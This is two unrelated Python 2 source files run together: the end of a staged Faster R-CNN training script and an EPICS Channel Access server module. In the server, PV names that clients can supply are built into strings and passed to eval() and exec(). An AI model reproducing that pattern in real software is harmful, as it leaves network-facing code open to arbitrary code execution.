# (e.g. "del net" in Python code). To work around this issue, each training
# stage is executed in a separate process using multiprocessing.Process.
# ------------------------------------------------------------------------------
def _init_caffe(cfg):
"""Initialize pycaffe in a training process.
"""
import caffe
# fix the random seeds (numpy and caffe) for reproducibility
np.random.seed(cfg.RNG_SEED)
caffe.set_random_seed(cfg.RNG_SEED)
# set up caffe
caffe.set_mode_gpu()
caffe.set_device(cfg.GPU_ID)
def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None):
"""Train a Region Proposal Network in a separate training process.
"""
# Not using any proposals, just ground-truth boxes
cfg.TRAIN.HAS_RPN = True
cfg.TRAIN.BBOX_REG = False # applies only to Fast R-CNN bbox regression
cfg.TRAIN.PROPOSAL_METHOD = 'gt'
cfg.TRAIN.IMS_PER_BATCH = 1
print 'Init model: {}'.format(init_model)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name)
print 'roidb len: {}'.format(len(roidb))
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rpn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
queue.put({'model_path': rpn_model_path})
def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None,
rpn_test_prototxt=None):
"""Use a trained RPN to generate proposals.
"""
cfg.TEST.RPN_PRE_NMS_TOP_N = -1 # no pre NMS filtering
cfg.TEST.RPN_POST_NMS_TOP_N = 2000 # limit top boxes after NMS
print 'RPN model: {}'.format(rpn_model_path)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
# NOTE: the matlab implementation computes proposals on flipped images, too.
# We compute them on the image once and then flip the already computed
# proposals. This might cause a minor loss in mAP (less proposal jittering).
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for proposal generation'.format(imdb.name)
# Load RPN and configure output directory
rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Generate proposals on the imdb
rpn_proposals = imdb_proposals(rpn_net, imdb)
# Write proposals to disk and send the proposal file path through the
# multiprocessing queue
rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0]
rpn_proposals_path = os.path.join(
output_dir, rpn_net_name + '_proposals.pkl')
with open(rpn_proposals_path, 'wb') as f:
cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL)
print 'Wrote RPN proposals to {}'.format(rpn_proposals_path)
queue.put({'proposal_path': rpn_proposals_path})
def train_fast_rcnn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, rpn_file=None):
"""Train a Fast R-CNN using proposals generated by an RPN.
"""
cfg.TRAIN.HAS_RPN = False # not generating prosals on-the-fly
cfg.TRAIN.PROPOSAL_METHOD = 'rpn' # use pre-computed RPN proposals instead
cfg.TRAIN.IMS_PER_BATCH = 2
print 'Init model: {}'.format(init_model)
print 'RPN proposals: {}'.format(rpn_file)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Train Fast R-CNN
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
fast_rcnn_model_path = model_paths[-1]
# Send Fast R-CNN model path over the multiprocessing queue
queue.put({'model_path': fast_rcnn_model_path})
if __name__ == '__main__':
args = parse_args()
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
# --------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are
# discarded (e.g. "del net" in Python code). To work around this issue, each
# training stage is executed in a separate process using
# multiprocessing.Process.
# --------------------------------------------------------------------------
# queue for communicated results between processes
mp_queue = mp.Queue()
# solves, iters, etc. for each training stage
solvers, max_iters, rpn_test_prototxt = get_solvers(args.net_name)
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[0],
max_iters=max_iters[0],
cfg=cfg)
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage1_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, generate proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
rpn_model_path=str(rpn_stage1_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage1_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 Fast R-CNN using RPN proposals, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[1],
max_iters=max_iters[1],
cfg=cfg,
rpn_file=rpn_stage1_out['proposal_path'])
p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
p.start()
fast_rcnn_stage1_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 RPN, init from stage 1 Fast R-CNN model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=str(fast_rcnn_stage1_out['model_path']),
solver=solvers[2],
max_iters=max_iters[2],
cfg=cfg)
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage2_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 RPN, generate proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
rpn_model_path=str(rpn_stage2_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage2_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 Fast R-CNN, init from stage 2 RPN R-CNN model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=str(rpn_stage2_out['model_path']),
solver=solvers[3],
max_iters=max_iters[3],
cfg=cfg,
rpn_file=rpn_stage2_out['proposal_path'])
p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
p.start()
fast_rcnn_stage2_out = mp_queue.get()
p.join()
# Create final model (just a copy of the last stage)
final_path = os.path.join(
os.path.dirname(fast_rcnn_stage2_out['model_path']),
args.net_name + '_faster_rcnn_final.caffemodel')
print 'cp {} -> {}'.format(
fast_rcnn_stage2_out['model_path'], final_path)
shutil.copy(fast_rcnn_stage2_out['model_path'], final_path)
print 'Final model: {}'.format(final_path)
|
CAServer.py | """
Support mudule for EPICS Input/Output Controllers (IOCs)
Implements the server side of the Channel Access (CA) protocol, version 4.11.
Author: Friedrich Schotte
Date created: 2009-10-31
Date last modified: 2019-06-02
based on: 'Channel Access Protocol Specification', version 4.11
http://epics.cosylab.com/cosyjava/JCA-Common/Documentation/CAproto.html
Object-Oriented Interface 1
PV class object: recommended for application that export a single
process variable.
def getT(): return float(serial_port.query("SET:TEMP?"))
def setT(T): serial_port.write("SET:TEMP %s" % T)
pv = PV("14IDB:TemperatureController.T",get=getT,set=setT)
Object-Oriented Interface 2
Use "register" object to export properties of a Python class object as
EPICS PVs.
class Temperature(object):
def get_value(self): return float(serial_port.query("SET:TEMP?"))
def set_value(self,value): serial_port.write("SET:TEMP %s" % value)
value = property(get_value,set_value)
T = Temperature()
register_object(T,prefix="14IDB:TemperatureController.")
Procedural Interface
casput ("14IDB:MyInstrument.VAL",1.234)
Creates a process variable named "14IDB:MyInstrument.VAL"
Subsequent calls to with difference value cause update events to besent to
connected clients.
casget ("14IDB:MyInstrument.VAL")
Reads back the current value of the "14IDB:MyInstrument.VAL", which may have
been modified be a client since the last casput.
casmonitor("14IDB:MyInstrument.VAL",callback=procedure)
The function "procedure" is called when a client modifies a the process
variable with three arguments:
- the name of the process variable
- the new value
- the new value as string
"""
from logging import debug,info,warn,error
__version__ = "1.5.1" # EPICS 3.16 compatibility: Read request have data_count=0
DEBUG = False # Generate debug messages?
registered_objects = []
def register_object(object,name=""):
"""Export object as PV under the given name"""
global registered_objects
start_server()
unregister_object(name=name)
registered_objects += [(object,name)]
casregister = CAServer_register = register_object # alias names
def unregister_object(object=None,name=None):
"""Undo 'register_object'"""
global registered_objects
if name is None:
for (o,n) in registered_objects:
if o is object: name = n
if name is not None:
for PV_name in PVs.keys():
if PV_name.startswith(name): delete_PV(PV_name)
if object is not None:
registered_objects = [(o,n) for (o,n) in registered_objects if not o is object]
if name is not None:
registered_objects = [(o,n) for (o,n) in registered_objects if not n == name]
registered_properties = {}
def register_property(object,property_name,PV_name):
"""Export object as PV under the given name"""
global registered_properties
start_server()
unregister_property(PV_name=PV_name)
registered_properties[PV_name] = (object,property_name)
def unregister_property(object=None,property_name=None,PV_name=None):
"""Undo 'register_object'"""
global registered_properties
if object is not None and property_name is not None and PV_name is not None:
if PV_name in registered_properties:
if registered_properties[PV_name] == (object,property_name):
del registered_properties[PV_name]
elif PV_name is not None:
if PV_name in registered_properties: del registered_properties[PV_name]
elif object is not None and property_name is not None:
for key in registered_properties.keys():
if registered_properties[key] == (object,property_name):
del registered_properties[key]
def casdel(name):
"""Undo 'casput'"""
for PV_name in PVs.keys():
if PV_name.startswith(name): delete_PV(PV_name)
class PV(object):
"""Process Variable.
Override the 'set_value' and 'get_value' methods in subclasses"""
instances = []
def __init__(self,name):
"""name: common prefix for all process variables, e.g.
'14IDB:MyInstrument.'"""
self.__name__ = name
self.instances += [self]
start_server()
def get_value(self): return getattr(self,"__value__",None)
def set_value(self,value): self.__value__ = value
value = property(get_value,set_value)
def get_connected(self): return PV_connected(self.__name__)
connected = property(get_connected)
def __setattr__(self,attr,value):
"""Called when x.attr = value is executed."""
##if DEBUG: debug("PV.__setattr__(%r,%r)" % (attr,value))
object.__setattr__(self,attr,value)
if attr == "value":
notify_subscribers_if_changed(self.__name__,value)
def __getattr__(self,attr):
"""Called when x.attr is evaluated."""
##if DEBUG: debug("PV.__getattr__(%r)" % attr)
value = object.__getattr__(self,attr)
if attr == "value":
notify_subscribers_if_changed(self.__name__,value)
return value
def casput(PV_name,value,update=True):
"""Create a new process variable with thte given name,
or update an existing one.
update: send an updaate to the clients even if the value has not changed.
"""
if DEBUG: debug("casput(%r,%r)" % (PV_name,value))
start_server()
if not PV_name in PVs.keys(): PVs[PV_name] = PV_info()
PV = PVs[PV_name]
if PV_value(PV_name) != value or update: PV_set_value(PV_name,value)
CAServer_put = casput
def casget(PV_name):
"""Current value of a process variable"""
start_server()
return PV_value(PV_name)
CAServer_get = casget
def casmonitor(PV_name,writer=None,callback=None):
"""Call a function every time a PV changes value.
writer: function that will be passed a formatted string:
"<PB_name> <date> <time> <value>"
E.g. "14IDB:SAMPLEZ.RBV 2013-11-02 18:25:13.555540 4.3290"
f=file("PV.log","w"); camonitor("14IDB:SAMPLEZ.RBV",f.write)
callback: function that will be passed three arguments:
the PV name, its new value, and its new value as string.
E.g. def callback(PV_name,value,char_value):
def callback(pvname,value,char_value): print pvname,value,char_value
"""
start_server()
if not PV_name in PVs.keys(): PVs[PV_name] = PV_info()
PV = PVs[PV_name]
if callback is None and writer is None:
# By default, if not argument are given, just print update messages.
import sys
writer = sys.stdout.write
if callback is not None:
if not callback in PV.callbacks: PV.callbacks += [callback]
if writer is not None:
if not writer in PV.writers: PV.writers += [writer]
CAServer_monitor = casmonitor
class PV_info:
"""State information for each process variable"""
def __init__(self):
self.value = None # current value in Python format
self.subscribers = {} # subscriber_info objects, indexed by (address,port)
self.channel_SID = None # server-assigned session identity number
self.last_updated = 0 # timestamp of value
self.callbacks = [] # for "casmonitor"
self.writers = [] # for "casmonitor"
PVs = {} # Active process variables, indexed by name
class subscriber_info:
"""State information for each active connection to a process variable"""
def __init__(self,subscription_ID=None,data_type=None,data_count=None):
"""subscription_ID: client-assigned number for EVENT_ADD updates"""
self.subscription_ID = subscription_ID
self.data_type = data_type # DOUBLE,LONG,STRING,...
self.data_count = data_count # 1 if a scalar, >1 if an array
cache = {} # values of PVs
cache_timeout = 1.0
class cache_entry():
def __init__(self,value,time):
self.value = value
self.time = time
def __repr__(self): return "(%r,%s)" % (self.value,date_string(self.time))
def PV_exists(PV_name):
"""Has a process variable with the given name been defined?"""
##return PV_name in PVs.keys() or PV_value(PV_name) is not None
return PV_value(PV_name) is not None
def PV_value(PV_name,cached=True):
"""The value of a process variable as Python data type.
If the process variable has not been define return None."""
from time import time
if cached and PV_name in cache:
if time() <= cache[PV_name].time + cache_timeout:
##if DEBUG: debug("%s in cache" % PV_name)
return cache[PV_name].value
##if DEBUG: debug("%s expired from cache" % PV_name)
value = PV_current_value(PV_name)
cache[PV_name] = cache_entry(value,time())
return value
def PV_current_value(PV_name):
"""The current value of a process variable as Python data type.
If the process variable has not been define return None."""
from time import time
t0 = time()
value = PV_value_or_object(PV_name)
# Is value is an object, use the PV name instead.
if isobject(value): value = "<record: %s>" % ", ".join(members(value))
##if DEBUG: debug("%s: current value %r (%.3f s)" % (PV_name,value,time()-t0))
return value
def PV_value_or_object(PV_name):
"""The current value of a process variable as Python data type.
If the process variable has not been define return None."""
for object,name in registered_objects:
if PV_name.startswith(name):
attribute = PV_name[len(name):]
##try: return eval("object"+attribute+".value")
##except: pass
try: return eval("object"+attribute)
except: pass
if PV_name in registered_properties:
object,property_name = registered_properties[PV_name]
try: return getattr(object,property_name)
except Exception,msg:
error("%s: %r.%s: %s" % (PV_name,object,property_name,msg))
record = object_instance(PV_name)
if record: return getattr(record,object_property(PV_name))
if PV_name in PVs.keys(): return PVs[PV_name].value
return None
def isobject(x):
"""Is x a class object?"""
if hasattr(x,"__len__"): return False # array
if hasattr(x,"__dict__"): return True
return False
def members(x):
"""x: class object
Return value: list of strings"""
function = type(lambda: 0)
members = []
for name in dir(x):
if name.startswith("__") and name.endswith("__"): continue
##if type(getattr(x,name)) == function: continue
members += [name]
return members
def PV_set_value(PV_name,value):
"""Modify the local value of a process variable
(The value retreived by 'PV_value')"""
if DEBUG: debug("set %s = %r" % (PV_name,value))
# Convert value to the correct data type.
# The value of a PV might be passed as string when the PV type is acually
# DOUBLE.
value = convert(PV_name,value)
if DEBUG: debug("converted %r to %r" % (PV_name,value))
for object,name in registered_objects:
if PV_name.startswith(name+"."):
attribute = PV_name[len(name+"."):]
PV_object_name = "object."+attribute
try: PV_object = eval(PV_object_name)
except Exception,exception:
if DEBUG: debug("%s: %s" % (PV_object_name,exception))
continue
if hasattr(PV_object,"value"):
code = "object.%s.value = %r" % (attribute,value)
from numpy import nan,inf # needed for exec
try:
exec(code)
if DEBUG: debug("Tried %s: OK" % code.replace("object",name))
continue
except Exception,exception:
if DEBUG: debug("Tried %s: failed: %s" % (code,exception))
else:
if not ("." in attribute or "[" in attribute):
try:
setattr(object,attribute,value)
if DEBUG: debug("Tried setattr(%s,%s,%r): OK" %
(name,attribute,value))
except Exception,exception:
if DEBUG: debug("Tried setattr(%s,%s,%r): %s" %
(name,attribute,value,exception))
else:
code = "object.%s = %r" % (attribute,value)
from numpy import nan,inf # needed for exec
try:
exec(code)
if DEBUG: debug("Tried %s: OK" % code.replace("object",name))
continue
except Exception,exception:
if DEBUG: debug("Tried %s: failed: %s" % (code,exception))
if PV_name in registered_properties:
object,property_name = registered_properties[PV_name]
try: setattr(object,property_name,value)
except Exception,msg:
error("%s: %r.%s = %r: %s",(PV_name,object,property_name,value,msg))
record = object_instance(PV_name)
if record:
setattr(record,object_property(PV_name),value)
if not PV_name in PVs.keys(): PVs[PV_name] = PV_info()
PV = PVs[PV_name]
PV.value = value
from time import time
PV.last_updated = time()
cache[PV_name] = cache_entry(value,PV.last_updated)
notify_subscribers(PV_name)
def call_callbacks(PV_name):
"""Call any callback routines for this PV."""
if not PV_name in PVs.keys(): return
PV = PVs[PV_name]
if len(PV.callbacks) > 0:
char_value = "%r" % PV.value
# Run the callback function in a separate thread to avoid
# deadlock in case the function calls "caput" or "caget".
from threading import Thread
for function in PV.callbacks:
if DEBUG: debug("%s: calling '%s'" % (PV_name,object_name(function)))
task = Thread(target=function,args=(PV_name,PV.value,char_value),
name="callback %s" % function)
task.daemon = True
task.start()
if len(PV.writers) > 0:
from datetime import datetime
message = "%s %s %r\n" % (PV_name,
datetime.fromtimestamp(PV.last_updated),PV.value)
for function in PV.writers:
if DEBUG: debug("%s: calling '%s'" % (PV_name,object_name(function)))
function(message)
notify_subscribers(PV_name)
def PV_subscribers(PV_name):
"""IP address/ports of clients are connected to a process variable.
Return value: list of (string,integer) tuples"""
if not PV_name in PVs.keys(): return []
PV = PVs[PV_name]
return PV.subscribers.keys()
def PV_nsubscribers(PV_name):
"""How many clients are connected to a process variable?"""
return len(PV_subscribers(PV_name))
def PV_connected(PV_name):
"""Is there a client currenlty subscribing to this process variable?"""
return len(PV_subscribers(PV_name)) > 0
def notify_subscribers_if_changed(PV_name,new_value):
"""Send update events to all client monitoring the given process variable
if the new value is different than the current value"""
##if DEBUG: debug("notify_subscribers_if_changed(%r,%r)" % (PV_name,new_value))
if not PV_name in PVs.keys(): return
PV = PVs[PV_name]
if new_value is None:
if DEBUG: info("CA: notify_subscribers_if_changed: %s = %s" % (PV_name,new_value))
##delete_PV(PV_name)
return
##if DEBUG: debug("PV %r, old value %r, new value %r: equal? %r" %
## (PV_name,PV.value,new_value,nan_equal(new_value,PV.value)))
if nan_equal(new_value,PV.value): return
new_value = PV_data(new_value)
##if DEBUG: debug("Updating PV %r, old value %r, new value %r" %
## (PV_name,PV.value,new_value))
PV.value = new_value
from time import time
PV.last_updated = time()
for address in PV.subscribers.keys():
# Notify connected clients that process variable has changed.
subscriber = PV.subscribers[address]
# Make sure client is interested in receiving update notifications.
if subscriber.subscription_ID == None: continue
# Make sure client is still connected.
if not address in connections: continue
connection = connections[address]
status_code = 1 # Normal successful completion
data = network_data(new_value,subscriber.data_type)
subscriber.data_count = CA_count(new_value)
send(connection,message("EVENT_ADD",0,subscriber.data_type,
subscriber.data_count,status_code,subscriber.subscription_ID,
data))
def notify_subscribers(PV_name):
"""Send update events to all client monitoring the given process variable"""
if not PV_name in PVs.keys(): return
PV = PVs[PV_name]
value = PV_value(PV_name)
if value is None:
if DEBUG: info("CA: notify_subscribers: %s=%r" % (PV_name,value))
##delete_PV(PV_name)
return
for address in PV.subscribers.keys():
if not address in PV.subscribers: continue
# Notify connected clients that process variable has changed.
subscriber = PV.subscribers[address]
# Make sure client is interested in receiving update notifications.
if subscriber.subscription_ID == None: continue
# Make sure client is still connected.
if not address in connections: continue
connection = connections[address]
status_code = 1 # Normal successful completion
data = network_data(value,subscriber.data_type)
subscriber.data_count = CA_count(value)
send(connection,message("EVENT_ADD",0,subscriber.data_type,
subscriber.data_count,status_code,subscriber.subscription_ID,
data))
def delete_PV(PV_name):
"""Call if PV no longer exists"""
disconnect_PV(PV_name)
if DEBUG: info("CAServer: deleting PV %r" % PV_name)
del PVs[PV_name]
def disconnect_PV(PV_name):
"""Notify subscribers that PV no longer exists."""
##if DEBUG: debug("notify_subscribers_if_changed(%r,%r)" % (PV_name,new_value))
if not PV_name in PVs.keys(): return
PV = PVs[PV_name]
for address in PV.subscribers.keys():
# Notify connected clients that process variable has changed.
subscriber = PV.subscribers[address]
# Make sure client is interested in receiving update notifications.
if subscriber.subscription_ID == None: continue
# Make sure client is still connected.
if not address in connections: continue
connection = connections[address]
status_code = 1 # Normal successful completion
send(connection,message("EVENT_CANCEL",0,subscriber.data_type,
subscriber.data_count,PV.channel_SID,subscriber.subscription_ID))
PV.subscribers = []
def PV_data(value):
"""If value is an array or a list, the current content of the array,
rather a reference to the array"""
if isinstance(value,basestring): return value
try: value = list(value[:])
except: pass
return value
def PV_names():
"""List of all currently defined process variables."""
PV_names = []
for pv in PV.instances: PV_names += [pv.__name__]
return PV_names
def connected_PVs():
"""All currently active process variables, with clients connected to them.
Return value: ist of strings"""
return [PV_name for PV_name in PVs.keys() if PV_connected(PV_name)]
def update_all_PVs():
"""Send update events to all connected clients for the PVs which have
changed since the last update."""
for PV_name in connected_PVs():
notify_subscribers_if_changed(PV_name,PV_value(PV_name,cached=False))
update_interval = 1.0 # Waiting time between PV updates in seconds.
def update_all_PVs_loop():
"""Keep polling actively subscribed PVs for changes and send update events
to connected clients."""
from time import sleep
while True:
sleep(update_interval)
update_all_PVs()
def properties(object):
"list of property names of a given class object"
names = []
for name in dir(object):
if name.startswith("__") and name.endswith("__"): continue
x = getattr(object,name)
if callable(x): continue
names += [name]
return names
def object_instance(PV_name):
"""The PV class object hosting a given process variable.
If not found the return value is None."""
for pv in PV.instances:
if pv.__name__ == PV_name: return pv
def object_property(PV_name):
"""The name of the property of an PV class object, hosting a given
process variable. If not found, the return value is None."""
for pv in PV.instances:
if pv.__name__ == PV_name: return "value"
# CA Message command codes:
commands = {
"VERSION": 0,
"EVENT_ADD": 1,
"EVENT_CANCEL": 2,
"READ": 3,
"WRITE": 4,
"SNAPSHOT": 5,
"SEARCH": 6,
"BUILD": 7,
"EVENTS_OFF": 8,
"EVENTS_ON": 9,
"READ_SYNC": 10,
"ERROR": 11,
"CLEAR_CHANNEL": 12,
"RSRV_IS_UP": 13,
"NOT_FOUND": 14,
"READ_NOTIFY": 15,
"READ_BUILD": 16,
"CREATE_CHAN": 18,
"WRITE_NOTIFY": 19,
"CLIENT_NAME": 20,
"HOST_NAME": 21,
"ACCESS_RIGHTS": 22,
"ECHO": 23,
"SIGNAL": 25,
"CREATE_CH_FAIL": 26,
"SERVER_DISCONN": 27,
}
def command_name(command_code):
"""'VERSION', 'EVENT_ADD',.... """
if not command_code in commands.values(): return str(command_code)
return commands.keys()[commands.values().index(command_code)]
# CA Payload Data Types:
types = {
"STRING": 0,
"SHORT": 1,
"FLOAT": 2,
"ENUM": 3,
"CHAR": 4,
"LONG": 5,
"DOUBLE": 6,
"STS_STRING": 7,
"STS_SHORT": 8,
"STS_FLOAT": 9,
"STS_ENUM": 10,
"STS_CHAR": 11,
"STS_LONG": 12,
"STS_DOUBLE": 13,
"TIME_STRING": 14,
"TIME_SHORT": 15,
"TIME_FLOAT": 16,
"TIME_ENUM": 17,
"TIME_CHAR": 18,
"TIME_LONG": 19,
"TIME_DOUBLE": 20,
"GR_STRING": 21,
"GR_SHORT": 22,
"GR_FLOAT": 23,
"GR_ENUM": 24,
"GR_CHAR": 25,
"GR_LONG": 26,
"GR_DOUBLE": 27,
"CTRL_STRING": 28,
"CTRL_SHORT": 29,
"CTRL_FLOAT": 30,
"CTRL_ENUM": 31,
"CTRL_CHAR": 32,
"CTRL_LONG": 33,
"CTRL_DOUBLE": 34,
}
def type_name(data_type):
"""Channel Access data type as string. data_type: integer number"""
if not data_type in types.values(): return str(data_type)
return types.keys()[types.values().index(data_type)]
# Return status codes
status_codes = {
"NORMAL": 0,
"MAXIOC": 1,
"UKNHOST": 2,
"UKNSERV": 3,
"SOCK": 4,
"CONN": 5,
"ALLOCMEM": 6,
"UKNCHAN": 7,
"UKNFIELD": 8,
"TOLARGE": 9,
"TIMEOUT": 10,
"NOSUPPORT": 11,
"STRTOBIG": 12,
"DISCONNCHID": 13,
"BADTYPE": 14,
"CHIDNOTFND": 15,
"CHIDRETRY": 16,
"INTERNAL": 17,
"DBLCLFAIL": 18,
"GETFAIL": 19,
"PUTFAIL": 20,
"ADDFAIL": 21,
"BADCOUNT": 22,
"BADSTR": 23,
"DISCONN": 24,
"DBLCHNL": 25,
"EVDISALLOW": 26,
"BUILDGET": 27,
"NEEDSFP": 28,
"OVEVFAIL": 29,
"BADMONID": 30,
"NEWADDR": 31,
"NEWCONN": 32,
"NOCACTX": 33,
"DEFUNCT": 34,
"EMPTYSTR": 35,
"NOREPEATER": 36,
"NOCHANMSG": 37,
"DLCKREST": 38,
"SERVBEHIND": 39,
"NOCAST": 40,
"BADMASK": 41,
"IODONE": 42,
"IOINPROGRESS": 43,
"BADSYNCGRP": 44,
"PUTCBINPROG": 45,
"NORDACCESS": 46,
"NOWTACCESS": 47,
"ANACHRONISM": 48,
"NOSEARCHADDR": 49,
"NOCONVERT": 50,
"BADCHID": 51,
"BADFUNCPTR": 52,
"ISATTACHED": 53,
"UNAVAILINSERV": 54,
"CHANDESTROY": 55,
"BADPRIORITY": 56,
"NOTTHREADED": 57,
"16KARRAYCLIENT": 58,
"CONNSEQTMO": 59,
"UNRESPTMO": 60,
}
severities = {
"WARNING": 0,
"SUCCESS": 1,
"ERROR": 2,
"INFO": 3,
"SEVERE": 4,
"FATAL": 6,
}
# Protocol version 4.11:
major_version = 4
minor_version = 11
# CA server port = 5056 + major version * 2 = 5064
# CA repeater port = 5056 + major version * 2 + 1 = 5065
TCP_port_number = 5064 # fixed
UDP_port_number = 5064 # default, may be different if multiple servers running
server_started = False
def start_server():
global server_started
if server_started: return
server_started = True
UDP_server = UDPServer(("",UDP_port_number),UDPHandler)
from threading import Thread
task = Thread(target=UDP_server.serve_forever,name="UDP_server.serve_forever")
task.daemon = True
task.start()
# Multiple CA servers may run on the same machine listening at the same UDP
# port number 5064.
# However, only the first server started can use TCP port 5064, the others
# have to use different port numbers (5065,5066,...).
global TCP_port_number
while True:
from socket import error as socket_error
try:
TCP_server = ThreadingTCPServer(("",TCP_port_number),TCPHandler)
break
except socket_error: TCP_port_number += 1
if DEBUG: debug("server version %s, listening on TCP/UDP port %d." % (__version__,TCP_port_number))
task = Thread(target=TCP_server.serve_forever,name="TCP_server.serve_forever")
task.daemon = True
task.start()
# Keep polling actively subscribed PVs and sending updates to connected
# clients.
task = Thread(target=update_all_PVs_loop,name="update_all_PVs_loop")
task.daemon = True
task.start()
import SocketServer
class UDPServer(SocketServer.UDPServer,SocketServer.ThreadingMixIn):
"""UPD server with customized socket options"""
# No long timeout for restarting the server ("port in use")
allow_reuse_address = True
# Ctrl-C will cleanly kill all spawned threads
daemon_threads = True
def server_bind(self):
"""Called by constructor to bind the socket."""
import socket
if self.allow_reuse_address:
# Without using the option SO_REUSEADDR, only one process can
# listen on a given UPD port number (error 'Address already in use').
# Also, without this option, one would have to wait 60 seconds
# after the server terminates, before another process can bind to
# the same port number, the time the socket remains in
# CLOSED_WAIT" state.
self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
if hasattr(socket,"SO_REUSEPORT"):
# SO_REUSEPORT allows completely duplicate bindings by multiple
# processes if they all set SO_REUSEPORT before binding the port.
# This option permits multiple instances of a program to each
# receive UDP/IP multicast or broadcast datagrams destined for the
# bound port.
# This option is needed for Mac OS X. On Linux, it is sufficient to
# set SO_REUSEADDR.
self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEPORT,1)
self.socket.bind(self.server_address)
self.server_address = self.socket.getsockname()
class ThreadingTCPServer(SocketServer.ThreadingTCPServer,SocketServer.ThreadingMixIn):
# No long timeout for restarting the server ("port in use")
import os
if os.name == "nt": allow_reuse_address = False # Windows
else: allow_reuse_address = True # Linux and Mac OS X
# Ctrl-C will cleanly kill all spawned threads
daemon_threads = True
class UDPHandler(SocketServer.BaseRequestHandler):
def handle(self):
addr = "%s:%d" % self.client_address
from socket import error as socket_error
messages = self.request[0]
# Several replies may be concantenated. Break them up.
while len(messages) > 0:
# The minimum message size is 16 bytes. If the 'payload size'
# field has value > 0, the total size if 16+'payload size'.
from struct import unpack
payload_size, = unpack(">H",messages[2:4])
message = messages[0:16+payload_size]
messages = messages[16+payload_size:]
##if DEBUG: debug("%s: UDP packet received: %s\n" % (addr,message_info(message)))
reply = process_message(self.client_address,message)
if reply:
if DEBUG: debug("%s: returning reply %r" % (addr,message_info(reply)))
self.request[1].sendto(reply,self.client_address)
